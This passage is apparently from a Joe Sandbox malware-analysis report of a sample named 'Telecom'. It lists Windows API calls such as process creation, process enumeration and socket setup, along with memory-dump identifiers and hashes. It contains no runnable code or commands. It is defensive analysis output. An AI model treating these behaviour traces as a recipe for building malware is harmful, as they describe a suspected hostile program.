                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID: SysTreeView32
                                                      • API String ID: 847901565-1698111956
                                                      • Opcode ID: 7398372b59ec655db185312ed1818759cc8715b1b6ca367ca0dbb4c4e9f28f3d
                                                      • Instruction ID: 688fcfae1d5840612dea7e118d81e1d48bb2edf469cacc01090aed57ff14acd4
                                                      • Opcode Fuzzy Hash: 7398372b59ec655db185312ed1818759cc8715b1b6ca367ca0dbb4c4e9f28f3d
                                                      • Instruction Fuzzy Hash: 7A319E71610205AFDB208F38CC55BEB77A9EB48328F24472BF975922E0C778AC509B58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 004D49DC
                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004D49F0
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 004D4A14
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: SysMonthCal32
                                                      • API String ID: 2326795674-1439706946
                                                      • Opcode ID: 6228cf20fec24f5cfc6991c02e2ab4d8c8dd8a9f2b1c3f1d5f2f662a598f1d3c
                                                      • Instruction ID: 8159c5ebba4cfb763406e018e683ba4404e110751c041930604010d931970c7c
                                                      • Opcode Fuzzy Hash: 6228cf20fec24f5cfc6991c02e2ab4d8c8dd8a9f2b1c3f1d5f2f662a598f1d3c
                                                      • Instruction Fuzzy Hash: C721F332600219BBDF118F60CC52FEF3B69EF88718F110216FA056B2D0D6B5E851DB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 004D51A3
                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 004D51B1
                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004D51B8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DestroyWindow
                                                      • String ID: msctls_updown32
                                                      • API String ID: 4014797782-2298589950
                                                      • Opcode ID: dccddcb9f46ddc4ba92be0b0f928a0f7af048d3eeb84a11c5608da10c171b25b
                                                      • Instruction ID: c4732324e0000e61abb3a549fcf95160e105816dd90fa0bf3383443d27cf2252
                                                      • Opcode Fuzzy Hash: dccddcb9f46ddc4ba92be0b0f928a0f7af048d3eeb84a11c5608da10c171b25b
                                                      • Instruction Fuzzy Hash: 712151B5A01609AFDB10DF28CC91DBB37ADEB5A368B04015BF90097361CB74EC55DAA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004D42DC
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004D42EC
                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 004D4312
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      • API String ID: 3315199576-2633736733
                                                      • Opcode ID: e54bdf8f1226e38c601efe8162537675d9fc27e9d5bae95fdbfad7933cf7c304
                                                      • Instruction ID: 6a73cd56d6875d99d5c6ecc77a7596c48158eb8524f9a3eccf43004cc7de582c
                                                      • Opcode Fuzzy Hash: e54bdf8f1226e38c601efe8162537675d9fc27e9d5bae95fdbfad7933cf7c304
                                                      • Instruction Fuzzy Hash: 9321C232610218BBEF118F94CC84FBF3B6EEFC97A4F118126F9009B290C6759C5287A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 004B544D
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 004B54A1
                                                      • SetErrorMode.KERNEL32(00000000,?,?,004DDCD0), ref: 004B5515
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume
                                                      • String ID: %lu
                                                      • API String ID: 2507767853-685833217
                                                      • Opcode ID: 4fbfa44bb3a564ed800e69407113f228648e1b46951b130cd97d17c6f44cd8ab
                                                      • Instruction ID: 60f396a9b94b7d1b6aa117cddd0515b1022861afbec06a57c0832cd2defdea68
                                                      • Opcode Fuzzy Hash: 4fbfa44bb3a564ed800e69407113f228648e1b46951b130cd97d17c6f44cd8ab
                                                      • Instruction Fuzzy Hash: 99314170A00109AFD710DF65C985EAEB7F8EF05308F1440AAE809DB362D775EE45DB65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetActiveWindow.USER32 ref: 004D8339
                                                      • EnumChildWindows.USER32(?,004D802F,00000000), ref: 004D83B0
                                                        • Part of subcall function 0044249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004424B0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$ActiveChildEnumLongWindows
                                                      • String ID: (Q$(Q
                                                      • API String ID: 3814560230-1236427130
                                                      • Opcode ID: d48d9b9a6004d99e9f89a9d23ba9f8b18099b57f5d1e8a728d10cdeeb251204a
                                                      • Instruction ID: 9eb6bb288a81a0864dc9283a9d5e3688aff43a31433ca7e084b3883ae0848cab
                                                      • Opcode Fuzzy Hash: d48d9b9a6004d99e9f89a9d23ba9f8b18099b57f5d1e8a728d10cdeeb251204a
                                                      • Instruction Fuzzy Hash: 1C214874200205DFC724DF28E850AA6B7E5FB59720F20461EE879C73A0DB75A8A1DB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004D4CED
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004D4D02
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 004D4D0F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      • Opcode ID: 9cd20c11511372e41f26c4b33f646677f1a214d2a1b2e167f273957a7a4acb8f
                                                      • Instruction ID: 12fa68f0abfbdb26e95d7b8682378a86d46d3541a63908902623ef0aca65afad
                                                      • Opcode Fuzzy Hash: 9cd20c11511372e41f26c4b33f646677f1a214d2a1b2e167f273957a7a4acb8f
                                                      • Instruction Fuzzy Hash: 06112331240208BFEF205F65CC06FAB3BA9EF85B24F11012AFA40E22A0C275D8519B24
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004D6360
                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004D638D
                                                      • DrawMenuBar.USER32(?), ref: 004D639C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Menu$InfoItem$Draw
                                                      • String ID: 0
                                                      • API String ID: 3227129158-4108050209
                                                      • Opcode ID: 9e7b4ce9e721c05db97b72f0193ba68e7748829a74a9233cddc040daf1a16488
                                                      • Instruction ID: d74110ef963ebcae35d06eefa1acf338b5659ce03e21b68016c379a7fb942bda
                                                      • Opcode Fuzzy Hash: 9e7b4ce9e721c05db97b72f0193ba68e7748829a74a9233cddc040daf1a16488
                                                      • Instruction Fuzzy Hash: 05016D31500218AFDF219F11DC84BAF7BB8FB45355F14809BE84AD6250DF348A85EF26
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetForegroundWindow.USER32(?,005128E0,004DAD55,000000FC,?,00000000,00000000,?), ref: 004D823F
                                                      • GetFocus.USER32 ref: 004D8247
                                                        • Part of subcall function 0044249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004424B0
                                                        • Part of subcall function 00442234: GetWindowLongW.USER32(?,000000EB), ref: 00442242
                                                      • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 004D82B4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$FocusForegroundMessageSend
                                                      • String ID: (Q
                                                      • API String ID: 3601265619-2768264020
                                                      • Opcode ID: 45fb9612281a941945c9a388495958d0e6cf8d52a4b68031d6636e1df2110430
                                                      • Instruction ID: c1726314d809bd9d9c7d30f6693d2466d3a820f06ad28d086eaba8dd9bb9a610
                                                      • Opcode Fuzzy Hash: 45fb9612281a941945c9a388495958d0e6cf8d52a4b68031d6636e1df2110430
                                                      • Instruction Fuzzy Hash: C2015E31602900DFC725DB68D854ABA37E6EBC9324F1442AFE416873A4CB356C5BCB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DestroyAcceleratorTable.USER32(?), ref: 004D8576
                                                      • CreateAcceleratorTableW.USER32(00000000,?,?,?,004BBE96,00000000,00000000,?,00000001,00000002), ref: 004D858C
                                                      • GetForegroundWindow.USER32(?,004BBE96,00000000,00000000,?,00000001,00000002), ref: 004D8595
                                                        • Part of subcall function 0044249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004424B0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                      • String ID: (Q
                                                      • API String ID: 986409557-2768264020
                                                      • Opcode ID: 22ea3a32f766b2c7d66869edf34ee46735d40722578147373240b10f5334951a
                                                      • Instruction ID: f6672cb1237f66955ebd7673b5e61aefd119fe929e4d6cd365fcc22e3cd6a868
                                                      • Opcode Fuzzy Hash: 22ea3a32f766b2c7d66869edf34ee46735d40722578147373240b10f5334951a
                                                      • Instruction Fuzzy Hash: 59012D30602354EFCB249F69ECA4AA637F5FB14325F10862FF511863B0DB34A9A4DB49
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00514038,0051407C), ref: 004D8C1A
                                                      • CloseHandle.KERNEL32 ref: 004D8C2C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID: 8@Q$|@Q
                                                      • API String ID: 3712363035-2456117094
                                                      • Opcode ID: 4c6f63e936ae5b00b0d97263ef4d045d9ce414c5f5129a88155fa359d412e477
                                                      • Instruction ID: db5f4a1bbb9680f3dec44514e23e9378b99772423d1d6bc5c95351955a5eb3d3
                                                      • Opcode Fuzzy Hash: 4c6f63e936ae5b00b0d97263ef4d045d9ce414c5f5129a88155fa359d412e477
                                                      • Instruction Fuzzy Hash: BBF03AB2581204BEF7106B62AC4DFB73E9CEB19755F005026BB08DA1A1E66548149BA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0049E797
                                                      • FreeLibrary.KERNEL32 ref: 0049E7BD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeLibraryProc
                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                      • API String ID: 3013587201-2590602151
                                                      • Opcode ID: 5b96960553a9fa81db7659e758251642efc8b599bc225d592baa85a109c79b30
                                                      • Instruction ID: 772037d2ad69baac3beb533bbeaadc8941f19cd11a267f56f1e0cad08fee36a8
                                                      • Opcode Fuzzy Hash: 5b96960553a9fa81db7659e758251642efc8b599bc225d592baa85a109c79b30
                                                      • Instruction Fuzzy Hash: E0E02B71C12511DBDB7186214C44FAE3A14BF21B01B5506B7EC41E2244DB2CCD4A865E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7e85d3f5e1567c1af56563e9699417e054ebab52c900421a6382f120c2e59886
                                                      • Instruction ID: 2e274339b613b7fe71173fd120d51f36b86f3f4975c6165fa4fb6dc64f826942
                                                      • Opcode Fuzzy Hash: 7e85d3f5e1567c1af56563e9699417e054ebab52c900421a6382f120c2e59886
                                                      • Instruction Fuzzy Hash: D2C18C75A0020AEFDB04CF94C884EAEB7B5FF59718F10819AE405EB251D735EE82CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: __alldvrm$_strrchr
                                                      • String ID:
                                                      • API String ID: 1036877536-0
                                                      • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                      • Instruction ID: fd5d735ebbb91c2a2416e64ecb0f220d381c872c5de80d7b622565e2ae0e238e
                                                      • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                      • Instruction Fuzzy Hash: 4DA12571A002859FDB21CE58C8917FEBBE5EF91314F2481AEE95D9B381C33C8941C759
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,004E0BD4,?), ref: 004A0EE0
                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,004E0BD4,?), ref: 004A0EF8
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,004DDCE0,000000FF,?,00000000,00000800,00000000,?,004E0BD4,?), ref: 004A0F1D
                                                      • _memcmp.LIBVCRUNTIME ref: 004A0F3E
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: FromProg$FreeTask_memcmp
                                                      • String ID:
                                                      • API String ID: 314563124-0
                                                      • Opcode ID: cf92f8e7b63dca8c77997f149043c5185e7d94837991fdadc71efd6e3336d6e6
                                                      • Instruction ID: a3055aabce1cf6d94b0e0577395a7d418af75e9f014818e701f5a83e20d631a9
                                                      • Opcode Fuzzy Hash: cf92f8e7b63dca8c77997f149043c5185e7d94837991fdadc71efd6e3336d6e6
                                                      • Instruction Fuzzy Hash: 7D813672A00109EFCB00DF94C984EEEB7B9FF89315F204599F516AB250DB75AE06CB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 004CB10C
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 004CB11A
                                                        • Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 004CB1FC
                                                      • CloseHandle.KERNEL32(00000000), ref: 004CB20B
                                                        • Part of subcall function 0045E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00484D73,?), ref: 0045E395
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                      • String ID:
                                                      • API String ID: 1991900642-0
                                                      • Opcode ID: 9f3d2a1c6602470ff8ac0a471078dc41f941f4f5ec980586fd27f1c0ec0376f2
                                                      • Instruction ID: a02b3febb8235c81ca04bae25477c0057d456f7e3774b96bcca606e1d945333b
                                                      • Opcode Fuzzy Hash: 9f3d2a1c6602470ff8ac0a471078dc41f941f4f5ec980586fd27f1c0ec0376f2
                                                      • Instruction Fuzzy Hash: D7513AB1908300AFD350EF25C886A5BBBE8FF89758F40492EF98597251EB34D904CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 004C255A
                                                      • WSAGetLastError.WSOCK32 ref: 004C2568
                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 004C25E7
                                                      • WSAGetLastError.WSOCK32 ref: 004C25F1
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$socket
                                                      • String ID:
                                                      • API String ID: 1881357543-0
                                                      • Opcode ID: 165701125adae535267ef3a2d35ac0128c8a5441298212ce96370536511dd00b
